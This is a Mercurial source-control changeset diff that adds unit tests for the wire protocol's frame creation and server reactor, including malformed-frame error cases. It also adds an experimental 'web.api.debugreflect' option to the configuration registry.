##// END OF EJS Templates
wireproto: implement basic frame reading and processing...
Gregory Szorc -
r37070:8c3c4736 default
parent child Browse files
Show More
@@ -0,0 +1,275 b''
1 from __future__ import absolute_import, print_function
2
3 import unittest
4
5 from mercurial import (
6 util,
7 wireprotoframing as framing,
8 )
9
# Shorthand: build a frame from its human-readable description.
ffs = framing.makeframefromhumanstring
11
def makereactor():
    """Create a fresh server reactor for a single test."""
    return framing.serverreactor()
14
def sendframes(reactor, gen):
    """Send a generator of frame bytearray to a reactor.

    Emits a generator of results from ``onframerecv()`` calls.
    """
    for rawframe in gen:
        ftype, fflags, flength = framing.parseheader(rawframe)
        body = rawframe[framing.FRAME_HEADER_SIZE:]
        # Sanity check: the header-declared length must match the payload.
        assert len(body) == flength

        yield reactor.onframerecv(ftype, fflags, body)
26
def sendcommandframes(reactor, cmd, args, datafh=None):
    """Generate frames to run a command and send them to a reactor."""
    frames = framing.createcommandframes(cmd, args, datafh)
    return sendframes(reactor, frames)
30
class FrameTests(unittest.TestCase):
    """Tests for turning commands into wire frames."""

    def testdataexactframesize(self):
        # A payload that exactly fills one frame must be followed by an
        # empty end-of-stream frame.
        data = util.bytesio(b'x' * framing.DEFAULT_MAX_FRAME_SIZE)

        frames = list(framing.createcommandframes(b'command', {}, data))
        expected = [
            ffs(b'command-name have-data command'),
            ffs(b'command-data continuation %s' % data.getvalue()),
            ffs(b'command-data eos '),
        ]
        self.assertEqual(frames, expected)

    def testdatamultipleframes(self):
        # One byte over the maximum frame size forces a second data frame.
        data = util.bytesio(b'x' * (framing.DEFAULT_MAX_FRAME_SIZE + 1))
        frames = list(framing.createcommandframes(b'command', {}, data))
        expected = [
            ffs(b'command-name have-data command'),
            ffs(b'command-data continuation %s' % (
                b'x' * framing.DEFAULT_MAX_FRAME_SIZE)),
            ffs(b'command-data eos x'),
        ]
        self.assertEqual(frames, expected)

    def testargsanddata(self):
        # Arguments and data each get their own frame sequence.
        data = util.bytesio(b'x' * 100)

        args = {
            b'key1': b'key1value',
            b'key2': b'key2value',
            b'key3': b'key3value',
        }
        frames = list(framing.createcommandframes(b'command', args, data))

        expected = [
            ffs(b'command-name have-args|have-data command'),
            ffs(br'command-argument 0 \x04\x00\x09\x00key1key1value'),
            ffs(br'command-argument 0 \x04\x00\x09\x00key2key2value'),
            ffs(br'command-argument eoa \x04\x00\x09\x00key3key3value'),
            ffs(b'command-data eos %s' % data.getvalue()),
        ]
        self.assertEqual(frames, expected)
68
class ServerReactorTests(unittest.TestCase):
    """Tests for the server reactor's frame-by-frame state machine."""

    def _sendsingleframe(self, reactor, s):
        """Send one frame (described by ``s``) and return the lone result."""
        results = list(sendframes(reactor, [ffs(s)]))
        self.assertEqual(len(results), 1)

        return results[0]

    def assertaction(self, res, expected):
        """Assert that a reactor result is an ``(action, meta)`` pair."""
        self.assertIsInstance(res, tuple)
        self.assertEqual(len(res), 2)
        self.assertIsInstance(res[1], dict)
        self.assertEqual(res[0], expected)

    def test1framecommand(self):
        """Receiving a command in a single frame yields request to run it."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand', {}))
        self.assertEqual(len(results), 1)
        self.assertaction(results[0], 'runcommand')
        self.assertEqual(results[0][1], {
            'command': b'mycommand',
            'args': {},
            'data': None,
        })

    def test1argument(self):
        """A single argument frame is buffered until the command is complete."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand',
                                         {b'foo': b'bar'}))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'runcommand')
        self.assertEqual(results[1][1], {
            'command': b'mycommand',
            'args': {b'foo': b'bar'},
            'data': None,
        })

    def testmultiarguments(self):
        """Multiple argument frames are all buffered before running."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand',
                                         {b'foo': b'bar', b'biz': b'baz'}))
        self.assertEqual(len(results), 3)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'wantframe')
        self.assertaction(results[2], 'runcommand')
        self.assertEqual(results[2][1], {
            'command': b'mycommand',
            'args': {b'foo': b'bar', b'biz': b'baz'},
            'data': None,
        })

    def testsimplecommanddata(self):
        """Command data arriving in one frame is attached to the command."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand', {},
                                         util.bytesio(b'data!')))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'runcommand')
        self.assertEqual(results[1][1], {
            'command': b'mycommand',
            'args': {},
            'data': b'data!',
        })

    def testmultipledataframes(self):
        """Data split across frames is concatenated before running."""
        frames = [
            ffs(b'command-name have-data mycommand'),
            ffs(b'command-data continuation data1'),
            ffs(b'command-data continuation data2'),
            ffs(b'command-data eos data3'),
        ]

        reactor = makereactor()
        results = list(sendframes(reactor, frames))
        self.assertEqual(len(results), 4)
        for i in range(3):
            self.assertaction(results[i], 'wantframe')
        self.assertaction(results[3], 'runcommand')
        self.assertEqual(results[3][1], {
            'command': b'mycommand',
            'args': {},
            'data': b'data1data2data3',
        })

    def testargumentanddata(self):
        """Commands with both arguments and data assemble both."""
        frames = [
            ffs(b'command-name have-args|have-data command'),
            ffs(br'command-argument 0 \x03\x00\x03\x00keyval'),
            ffs(br'command-argument eoa \x03\x00\x03\x00foobar'),
            ffs(b'command-data continuation value1'),
            ffs(b'command-data eos value2'),
        ]

        reactor = makereactor()
        results = list(sendframes(reactor, frames))

        self.assertaction(results[-1], 'runcommand')
        self.assertEqual(results[-1][1], {
            'command': b'command',
            'args': {
                b'key': b'val',
                b'foo': b'bar',
            },
            'data': b'value1value2',
        })

    def testunexpectedcommandargument(self):
        """Command argument frame when not running a command is an error."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-argument 0 ignored')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'expected command frame; got 2',
        })

    def testunexpectedcommanddata(self):
        """Command data frame when not running a command is an error."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-data 0 ignored')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'expected command frame; got 3',
        })

    def testmissingcommandframeflags(self):
        """Command name frame must have flags set."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-name 0 command')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'missing frame flags on command frame',
        })

    def testmissingargumentframe(self):
        """A non-argument frame while arguments are expected is an error."""
        frames = [
            ffs(b'command-name have-args command'),
            ffs(b'command-name 0 ignored'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'expected command argument frame; got 1',
        })

    def testincompleteargumentname(self):
        """Argument frame with incomplete name."""
        frames = [
            ffs(b'command-name have-args command1'),
            # Declared name length (0xadde) exceeds the payload.
            ffs(br'command-argument eoa \x04\x00\xde\xadfoo'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'malformed argument frame: partial argument name',
        })

    def testincompleteargumentvalue(self):
        """Argument frame with incomplete value."""
        frames = [
            ffs(b'command-name have-args command'),
            # Declared value length (0xaaaa) exceeds the payload.
            ffs(br'command-argument eoa \x03\x00\xaa\xaafoopartialvalue'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'malformed argument frame: partial argument value',
        })

    def testmissingcommanddataframe(self):
        """A non-data frame while data is expected is an error."""
        frames = [
            ffs(b'command-name have-data command1'),
            ffs(b'command-name eos command2'),
        ]
        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'expected command data frame; got 1',
        })

    def testmissingcommanddataframeflags(self):
        """Command data frames must carry flags."""
        frames = [
            ffs(b'command-name have-data command1'),
            ffs(b'command-data 0 data'),
        ]
        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'command data frame without flags',
        })
272
if __name__ == '__main__':
    # Run via Mercurial's silenttestrunner when executed directly.
    import silenttestrunner
    silenttestrunner.main(__name__)
@@ -1,1317 +1,1320 b''
1 1 # configitems.py - centralized declaration of configuration option
2 2 #
3 3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import functools
11 11 import re
12 12
13 13 from . import (
14 14 encoding,
15 15 error,
16 16 )
17 17
def loadconfigtable(ui, extname, configtable):
    """update config item known to the ui with the extension ones"""
    for section, items in sorted(configtable.items()):
        knownitems = ui._knownconfig.setdefault(section, itemregister())
        # Warn about items an extension redefines on top of known ones.
        duplicates = set(knownitems) & set(items)
        for key in sorted(duplicates):
            msg = "extension '%s' overwrite config item '%s.%s'"
            msg %= (extname, section, key)
            ui.develwarn(msg, config='warn-config')

        knownitems.update(items)
30 30
class configitem(object):
    """represent a known config item

    :section: the official config section where to find this item,
    :name: the official name within the section,
    :default: default value for this item,
    :alias: optional list of tuples as alternatives,
    :generic: this is a generic definition, match name using regular expression.
    """

    def __init__(self, section, name, default=None, alias=(),
                 generic=False, priority=0):
        self.section = section
        self.name = name
        self.default = default
        self.alias = list(alias)
        self.generic = generic
        self.priority = priority
        # Generic items match candidate names by regex instead of equality.
        self._re = re.compile(self.name) if generic else None
52 52
class itemregister(dict):
    """A specialized dictionary that can handle wild-card selection"""

    def __init__(self):
        super(itemregister, self).__init__()
        # Items whose name is a regex pattern rather than a literal key.
        self._generics = set()

    def update(self, other):
        super(itemregister, self).update(other)
        self._generics.update(other._generics)

    def __setitem__(self, key, item):
        super(itemregister, self).__setitem__(key, item)
        if item.generic:
            self._generics.add(item)

    def get(self, key):
        exact = super(itemregister, self).get(key)
        if exact is not None and not exact.generic:
            return exact

        # No literal hit; fall back to generic items ordered by
        # (priority, name) for deterministic selection.
        for candidate in sorted(self._generics,
                                key=lambda i: (i.priority, i.name)):
            # We use 'match' instead of 'search' to make the matching simpler
            # for people unfamiliar with regular expression. Having the match
            # rooted to the start of the string will produce less surprising
            # result for user writing simple regex for sub-attribute.
            #
            # For example using "color\..*" match produces an unsurprising
            # result, while using search could suddenly match apparently
            # unrelated configuration that happens to contains "color."
            # anywhere. This is a tradeoff where we favor requiring ".*" on
            # some match to avoid the need to prefix most pattern with "^".
            # The "^" seems more error prone.
            if candidate._re.match(key):
                return candidate

        return None
92 92
coreitems = {}

def _register(configtable, *args, **kwargs):
    """Build a configitem and file it in ``configtable`` by section/name."""
    item = configitem(*args, **kwargs)
    section = configtable.setdefault(item.section, itemregister())
    # Registering the same section/name twice is a programming error.
    if item.name in section:
        msg = "duplicated config item registration for '%s.%s'"
        raise error.ProgrammingError(msg % (item.section, item.name))
    section[item.name] = item
102 102
# special value for case where the default is derived from other values
dynamicdefault = object()

# Registering actual config items

def getitemregister(configtable):
    """Return a registration function bound to ``configtable``."""
    register = functools.partial(_register, configtable)
    # export pseudo enum as configitem.*
    register.dynamicdefault = dynamicdefault
    return register

coreconfigitem = getitemregister(coreitems)
116 116 coreconfigitem('alias', '.*',
117 117 default=None,
118 118 generic=True,
119 119 )
120 120 coreconfigitem('annotate', 'nodates',
121 121 default=False,
122 122 )
123 123 coreconfigitem('annotate', 'showfunc',
124 124 default=False,
125 125 )
126 126 coreconfigitem('annotate', 'unified',
127 127 default=None,
128 128 )
129 129 coreconfigitem('annotate', 'git',
130 130 default=False,
131 131 )
132 132 coreconfigitem('annotate', 'ignorews',
133 133 default=False,
134 134 )
135 135 coreconfigitem('annotate', 'ignorewsamount',
136 136 default=False,
137 137 )
138 138 coreconfigitem('annotate', 'ignoreblanklines',
139 139 default=False,
140 140 )
141 141 coreconfigitem('annotate', 'ignorewseol',
142 142 default=False,
143 143 )
144 144 coreconfigitem('annotate', 'nobinary',
145 145 default=False,
146 146 )
147 147 coreconfigitem('annotate', 'noprefix',
148 148 default=False,
149 149 )
150 150 coreconfigitem('auth', 'cookiefile',
151 151 default=None,
152 152 )
153 153 # bookmarks.pushing: internal hack for discovery
154 154 coreconfigitem('bookmarks', 'pushing',
155 155 default=list,
156 156 )
157 157 # bundle.mainreporoot: internal hack for bundlerepo
158 158 coreconfigitem('bundle', 'mainreporoot',
159 159 default='',
160 160 )
161 161 # bundle.reorder: experimental config
162 162 coreconfigitem('bundle', 'reorder',
163 163 default='auto',
164 164 )
165 165 coreconfigitem('censor', 'policy',
166 166 default='abort',
167 167 )
168 168 coreconfigitem('chgserver', 'idletimeout',
169 169 default=3600,
170 170 )
171 171 coreconfigitem('chgserver', 'skiphash',
172 172 default=False,
173 173 )
174 174 coreconfigitem('cmdserver', 'log',
175 175 default=None,
176 176 )
177 177 coreconfigitem('color', '.*',
178 178 default=None,
179 179 generic=True,
180 180 )
181 181 coreconfigitem('color', 'mode',
182 182 default='auto',
183 183 )
184 184 coreconfigitem('color', 'pagermode',
185 185 default=dynamicdefault,
186 186 )
187 187 coreconfigitem('commands', 'show.aliasprefix',
188 188 default=list,
189 189 )
190 190 coreconfigitem('commands', 'status.relative',
191 191 default=False,
192 192 )
193 193 coreconfigitem('commands', 'status.skipstates',
194 194 default=[],
195 195 )
196 196 coreconfigitem('commands', 'status.verbose',
197 197 default=False,
198 198 )
199 199 coreconfigitem('commands', 'update.check',
200 200 default=None,
201 201 # Deprecated, remove after 4.4 release
202 202 alias=[('experimental', 'updatecheck')]
203 203 )
204 204 coreconfigitem('commands', 'update.requiredest',
205 205 default=False,
206 206 )
207 207 coreconfigitem('committemplate', '.*',
208 208 default=None,
209 209 generic=True,
210 210 )
211 211 coreconfigitem('convert', 'cvsps.cache',
212 212 default=True,
213 213 )
214 214 coreconfigitem('convert', 'cvsps.fuzz',
215 215 default=60,
216 216 )
217 217 coreconfigitem('convert', 'cvsps.logencoding',
218 218 default=None,
219 219 )
220 220 coreconfigitem('convert', 'cvsps.mergefrom',
221 221 default=None,
222 222 )
223 223 coreconfigitem('convert', 'cvsps.mergeto',
224 224 default=None,
225 225 )
226 226 coreconfigitem('convert', 'git.committeractions',
227 227 default=lambda: ['messagedifferent'],
228 228 )
229 229 coreconfigitem('convert', 'git.extrakeys',
230 230 default=list,
231 231 )
232 232 coreconfigitem('convert', 'git.findcopiesharder',
233 233 default=False,
234 234 )
235 235 coreconfigitem('convert', 'git.remoteprefix',
236 236 default='remote',
237 237 )
238 238 coreconfigitem('convert', 'git.renamelimit',
239 239 default=400,
240 240 )
241 241 coreconfigitem('convert', 'git.saverev',
242 242 default=True,
243 243 )
244 244 coreconfigitem('convert', 'git.similarity',
245 245 default=50,
246 246 )
247 247 coreconfigitem('convert', 'git.skipsubmodules',
248 248 default=False,
249 249 )
250 250 coreconfigitem('convert', 'hg.clonebranches',
251 251 default=False,
252 252 )
253 253 coreconfigitem('convert', 'hg.ignoreerrors',
254 254 default=False,
255 255 )
256 256 coreconfigitem('convert', 'hg.revs',
257 257 default=None,
258 258 )
259 259 coreconfigitem('convert', 'hg.saverev',
260 260 default=False,
261 261 )
262 262 coreconfigitem('convert', 'hg.sourcename',
263 263 default=None,
264 264 )
265 265 coreconfigitem('convert', 'hg.startrev',
266 266 default=None,
267 267 )
268 268 coreconfigitem('convert', 'hg.tagsbranch',
269 269 default='default',
270 270 )
271 271 coreconfigitem('convert', 'hg.usebranchnames',
272 272 default=True,
273 273 )
274 274 coreconfigitem('convert', 'ignoreancestorcheck',
275 275 default=False,
276 276 )
277 277 coreconfigitem('convert', 'localtimezone',
278 278 default=False,
279 279 )
280 280 coreconfigitem('convert', 'p4.encoding',
281 281 default=dynamicdefault,
282 282 )
283 283 coreconfigitem('convert', 'p4.startrev',
284 284 default=0,
285 285 )
286 286 coreconfigitem('convert', 'skiptags',
287 287 default=False,
288 288 )
289 289 coreconfigitem('convert', 'svn.debugsvnlog',
290 290 default=True,
291 291 )
292 292 coreconfigitem('convert', 'svn.trunk',
293 293 default=None,
294 294 )
295 295 coreconfigitem('convert', 'svn.tags',
296 296 default=None,
297 297 )
298 298 coreconfigitem('convert', 'svn.branches',
299 299 default=None,
300 300 )
301 301 coreconfigitem('convert', 'svn.startrev',
302 302 default=0,
303 303 )
304 304 coreconfigitem('debug', 'dirstate.delaywrite',
305 305 default=0,
306 306 )
307 307 coreconfigitem('defaults', '.*',
308 308 default=None,
309 309 generic=True,
310 310 )
311 311 coreconfigitem('devel', 'all-warnings',
312 312 default=False,
313 313 )
314 314 coreconfigitem('devel', 'bundle2.debug',
315 315 default=False,
316 316 )
317 317 coreconfigitem('devel', 'cache-vfs',
318 318 default=None,
319 319 )
320 320 coreconfigitem('devel', 'check-locks',
321 321 default=False,
322 322 )
323 323 coreconfigitem('devel', 'check-relroot',
324 324 default=False,
325 325 )
326 326 coreconfigitem('devel', 'default-date',
327 327 default=None,
328 328 )
329 329 coreconfigitem('devel', 'deprec-warn',
330 330 default=False,
331 331 )
332 332 coreconfigitem('devel', 'disableloaddefaultcerts',
333 333 default=False,
334 334 )
335 335 coreconfigitem('devel', 'warn-empty-changegroup',
336 336 default=False,
337 337 )
338 338 coreconfigitem('devel', 'legacy.exchange',
339 339 default=list,
340 340 )
341 341 coreconfigitem('devel', 'servercafile',
342 342 default='',
343 343 )
344 344 coreconfigitem('devel', 'serverexactprotocol',
345 345 default='',
346 346 )
347 347 coreconfigitem('devel', 'serverrequirecert',
348 348 default=False,
349 349 )
350 350 coreconfigitem('devel', 'strip-obsmarkers',
351 351 default=True,
352 352 )
353 353 coreconfigitem('devel', 'warn-config',
354 354 default=None,
355 355 )
356 356 coreconfigitem('devel', 'warn-config-default',
357 357 default=None,
358 358 )
359 359 coreconfigitem('devel', 'user.obsmarker',
360 360 default=None,
361 361 )
362 362 coreconfigitem('devel', 'warn-config-unknown',
363 363 default=None,
364 364 )
365 365 coreconfigitem('devel', 'debug.peer-request',
366 366 default=False,
367 367 )
368 368 coreconfigitem('diff', 'nodates',
369 369 default=False,
370 370 )
371 371 coreconfigitem('diff', 'showfunc',
372 372 default=False,
373 373 )
374 374 coreconfigitem('diff', 'unified',
375 375 default=None,
376 376 )
377 377 coreconfigitem('diff', 'git',
378 378 default=False,
379 379 )
380 380 coreconfigitem('diff', 'ignorews',
381 381 default=False,
382 382 )
383 383 coreconfigitem('diff', 'ignorewsamount',
384 384 default=False,
385 385 )
386 386 coreconfigitem('diff', 'ignoreblanklines',
387 387 default=False,
388 388 )
389 389 coreconfigitem('diff', 'ignorewseol',
390 390 default=False,
391 391 )
392 392 coreconfigitem('diff', 'nobinary',
393 393 default=False,
394 394 )
395 395 coreconfigitem('diff', 'noprefix',
396 396 default=False,
397 397 )
398 398 coreconfigitem('email', 'bcc',
399 399 default=None,
400 400 )
401 401 coreconfigitem('email', 'cc',
402 402 default=None,
403 403 )
404 404 coreconfigitem('email', 'charsets',
405 405 default=list,
406 406 )
407 407 coreconfigitem('email', 'from',
408 408 default=None,
409 409 )
410 410 coreconfigitem('email', 'method',
411 411 default='smtp',
412 412 )
413 413 coreconfigitem('email', 'reply-to',
414 414 default=None,
415 415 )
416 416 coreconfigitem('email', 'to',
417 417 default=None,
418 418 )
419 419 coreconfigitem('experimental', 'archivemetatemplate',
420 420 default=dynamicdefault,
421 421 )
422 422 coreconfigitem('experimental', 'bundle-phases',
423 423 default=False,
424 424 )
425 425 coreconfigitem('experimental', 'bundle2-advertise',
426 426 default=True,
427 427 )
428 428 coreconfigitem('experimental', 'bundle2-output-capture',
429 429 default=False,
430 430 )
431 431 coreconfigitem('experimental', 'bundle2.pushback',
432 432 default=False,
433 433 )
434 434 coreconfigitem('experimental', 'bundle2.stream',
435 435 default=False,
436 436 )
437 437 coreconfigitem('experimental', 'bundle2lazylocking',
438 438 default=False,
439 439 )
440 440 coreconfigitem('experimental', 'bundlecomplevel',
441 441 default=None,
442 442 )
443 443 coreconfigitem('experimental', 'changegroup3',
444 444 default=False,
445 445 )
446 446 coreconfigitem('experimental', 'clientcompressionengines',
447 447 default=list,
448 448 )
449 449 coreconfigitem('experimental', 'copytrace',
450 450 default='on',
451 451 )
452 452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
453 453 default=100,
454 454 )
455 455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
456 456 default=100,
457 457 )
458 458 coreconfigitem('experimental', 'crecordtest',
459 459 default=None,
460 460 )
461 461 coreconfigitem('experimental', 'directaccess',
462 462 default=False,
463 463 )
464 464 coreconfigitem('experimental', 'directaccess.revnums',
465 465 default=False,
466 466 )
467 467 coreconfigitem('experimental', 'editortmpinhg',
468 468 default=False,
469 469 )
470 470 coreconfigitem('experimental', 'evolution',
471 471 default=list,
472 472 )
473 473 coreconfigitem('experimental', 'evolution.allowdivergence',
474 474 default=False,
475 475 alias=[('experimental', 'allowdivergence')]
476 476 )
477 477 coreconfigitem('experimental', 'evolution.allowunstable',
478 478 default=None,
479 479 )
480 480 coreconfigitem('experimental', 'evolution.createmarkers',
481 481 default=None,
482 482 )
483 483 coreconfigitem('experimental', 'evolution.effect-flags',
484 484 default=True,
485 485 alias=[('experimental', 'effect-flags')]
486 486 )
487 487 coreconfigitem('experimental', 'evolution.exchange',
488 488 default=None,
489 489 )
490 490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
491 491 default=False,
492 492 )
493 493 coreconfigitem('experimental', 'evolution.report-instabilities',
494 494 default=True,
495 495 )
496 496 coreconfigitem('experimental', 'evolution.track-operation',
497 497 default=True,
498 498 )
499 499 coreconfigitem('experimental', 'worddiff',
500 500 default=False,
501 501 )
502 502 coreconfigitem('experimental', 'maxdeltachainspan',
503 503 default=-1,
504 504 )
505 505 coreconfigitem('experimental', 'mergetempdirprefix',
506 506 default=None,
507 507 )
508 508 coreconfigitem('experimental', 'mmapindexthreshold',
509 509 default=None,
510 510 )
511 511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
512 512 default=False,
513 513 )
514 514 coreconfigitem('experimental', 'exportableenviron',
515 515 default=list,
516 516 )
517 517 coreconfigitem('experimental', 'extendedheader.index',
518 518 default=None,
519 519 )
520 520 coreconfigitem('experimental', 'extendedheader.similarity',
521 521 default=False,
522 522 )
523 523 coreconfigitem('experimental', 'format.compression',
524 524 default='zlib',
525 525 )
526 526 coreconfigitem('experimental', 'graphshorten',
527 527 default=False,
528 528 )
529 529 coreconfigitem('experimental', 'graphstyle.parent',
530 530 default=dynamicdefault,
531 531 )
532 532 coreconfigitem('experimental', 'graphstyle.missing',
533 533 default=dynamicdefault,
534 534 )
535 535 coreconfigitem('experimental', 'graphstyle.grandparent',
536 536 default=dynamicdefault,
537 537 )
538 538 coreconfigitem('experimental', 'hook-track-tags',
539 539 default=False,
540 540 )
541 541 coreconfigitem('experimental', 'httppostargs',
542 542 default=False,
543 543 )
544 544 coreconfigitem('experimental', 'mergedriver',
545 545 default=None,
546 546 )
547 547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
548 548 default=False,
549 549 )
550 550 coreconfigitem('experimental', 'remotenames',
551 551 default=False,
552 552 )
553 553 coreconfigitem('experimental', 'revlogv2',
554 554 default=None,
555 555 )
556 556 coreconfigitem('experimental', 'single-head-per-branch',
557 557 default=False,
558 558 )
559 559 coreconfigitem('experimental', 'sshserver.support-v2',
560 560 default=False,
561 561 )
562 562 coreconfigitem('experimental', 'spacemovesdown',
563 563 default=False,
564 564 )
565 565 coreconfigitem('experimental', 'sparse-read',
566 566 default=False,
567 567 )
568 568 coreconfigitem('experimental', 'sparse-read.density-threshold',
569 569 default=0.25,
570 570 )
571 571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
572 572 default='256K',
573 573 )
574 574 coreconfigitem('experimental', 'treemanifest',
575 575 default=False,
576 576 )
577 577 coreconfigitem('experimental', 'update.atomic-file',
578 578 default=False,
579 579 )
580 580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
581 581 default=False,
582 582 )
583 583 coreconfigitem('experimental', 'web.apiserver',
584 584 default=False,
585 585 )
586 586 coreconfigitem('experimental', 'web.api.http-v2',
587 587 default=False,
588 588 )
589 coreconfigitem('experimental', 'web.api.debugreflect',
590 default=False,
591 )
589 592 coreconfigitem('experimental', 'xdiff',
590 593 default=False,
591 594 )
592 595 coreconfigitem('extensions', '.*',
593 596 default=None,
594 597 generic=True,
595 598 )
596 599 coreconfigitem('extdata', '.*',
597 600 default=None,
598 601 generic=True,
599 602 )
600 603 coreconfigitem('format', 'aggressivemergedeltas',
601 604 default=False,
602 605 )
603 606 coreconfigitem('format', 'chunkcachesize',
604 607 default=None,
605 608 )
606 609 coreconfigitem('format', 'dotencode',
607 610 default=True,
608 611 )
609 612 coreconfigitem('format', 'generaldelta',
610 613 default=False,
611 614 )
612 615 coreconfigitem('format', 'manifestcachesize',
613 616 default=None,
614 617 )
615 618 coreconfigitem('format', 'maxchainlen',
616 619 default=None,
617 620 )
618 621 coreconfigitem('format', 'obsstore-version',
619 622 default=None,
620 623 )
621 624 coreconfigitem('format', 'usefncache',
622 625 default=True,
623 626 )
624 627 coreconfigitem('format', 'usegeneraldelta',
625 628 default=True,
626 629 )
627 630 coreconfigitem('format', 'usestore',
628 631 default=True,
629 632 )
630 633 coreconfigitem('fsmonitor', 'warn_when_unused',
631 634 default=True,
632 635 )
633 636 coreconfigitem('fsmonitor', 'warn_update_file_count',
634 637 default=50000,
635 638 )
636 639 coreconfigitem('hooks', '.*',
637 640 default=dynamicdefault,
638 641 generic=True,
639 642 )
640 643 coreconfigitem('hgweb-paths', '.*',
641 644 default=list,
642 645 generic=True,
643 646 )
644 647 coreconfigitem('hostfingerprints', '.*',
645 648 default=list,
646 649 generic=True,
647 650 )
648 651 coreconfigitem('hostsecurity', 'ciphers',
649 652 default=None,
650 653 )
651 654 coreconfigitem('hostsecurity', 'disabletls10warning',
652 655 default=False,
653 656 )
654 657 coreconfigitem('hostsecurity', 'minimumprotocol',
655 658 default=dynamicdefault,
656 659 )
657 660 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
658 661 default=dynamicdefault,
659 662 generic=True,
660 663 )
661 664 coreconfigitem('hostsecurity', '.*:ciphers$',
662 665 default=dynamicdefault,
663 666 generic=True,
664 667 )
665 668 coreconfigitem('hostsecurity', '.*:fingerprints$',
666 669 default=list,
667 670 generic=True,
668 671 )
669 672 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
670 673 default=None,
671 674 generic=True,
672 675 )
673 676
674 677 coreconfigitem('http_proxy', 'always',
675 678 default=False,
676 679 )
677 680 coreconfigitem('http_proxy', 'host',
678 681 default=None,
679 682 )
680 683 coreconfigitem('http_proxy', 'no',
681 684 default=list,
682 685 )
683 686 coreconfigitem('http_proxy', 'passwd',
684 687 default=None,
685 688 )
686 689 coreconfigitem('http_proxy', 'user',
687 690 default=None,
688 691 )
689 692 coreconfigitem('logtoprocess', 'commandexception',
690 693 default=None,
691 694 )
692 695 coreconfigitem('logtoprocess', 'commandfinish',
693 696 default=None,
694 697 )
695 698 coreconfigitem('logtoprocess', 'command',
696 699 default=None,
697 700 )
698 701 coreconfigitem('logtoprocess', 'develwarn',
699 702 default=None,
700 703 )
701 704 coreconfigitem('logtoprocess', 'uiblocked',
702 705 default=None,
703 706 )
704 707 coreconfigitem('merge', 'checkunknown',
705 708 default='abort',
706 709 )
707 710 coreconfigitem('merge', 'checkignored',
708 711 default='abort',
709 712 )
710 713 coreconfigitem('experimental', 'merge.checkpathconflicts',
711 714 default=False,
712 715 )
713 716 coreconfigitem('merge', 'followcopies',
714 717 default=True,
715 718 )
716 719 coreconfigitem('merge', 'on-failure',
717 720 default='continue',
718 721 )
719 722 coreconfigitem('merge', 'preferancestor',
720 723 default=lambda: ['*'],
721 724 )
722 725 coreconfigitem('merge-tools', '.*',
723 726 default=None,
724 727 generic=True,
725 728 )
726 729 coreconfigitem('merge-tools', br'.*\.args$',
727 730 default="$local $base $other",
728 731 generic=True,
729 732 priority=-1,
730 733 )
731 734 coreconfigitem('merge-tools', br'.*\.binary$',
732 735 default=False,
733 736 generic=True,
734 737 priority=-1,
735 738 )
736 739 coreconfigitem('merge-tools', br'.*\.check$',
737 740 default=list,
738 741 generic=True,
739 742 priority=-1,
740 743 )
741 744 coreconfigitem('merge-tools', br'.*\.checkchanged$',
742 745 default=False,
743 746 generic=True,
744 747 priority=-1,
745 748 )
746 749 coreconfigitem('merge-tools', br'.*\.executable$',
747 750 default=dynamicdefault,
748 751 generic=True,
749 752 priority=-1,
750 753 )
751 754 coreconfigitem('merge-tools', br'.*\.fixeol$',
752 755 default=False,
753 756 generic=True,
754 757 priority=-1,
755 758 )
756 759 coreconfigitem('merge-tools', br'.*\.gui$',
757 760 default=False,
758 761 generic=True,
759 762 priority=-1,
760 763 )
761 764 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
762 765 default='basic',
763 766 generic=True,
764 767 priority=-1,
765 768 )
766 769 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
767 770 default=dynamicdefault, # take from ui.mergemarkertemplate
768 771 generic=True,
769 772 priority=-1,
770 773 )
771 774 coreconfigitem('merge-tools', br'.*\.priority$',
772 775 default=0,
773 776 generic=True,
774 777 priority=-1,
775 778 )
776 779 coreconfigitem('merge-tools', br'.*\.premerge$',
777 780 default=dynamicdefault,
778 781 generic=True,
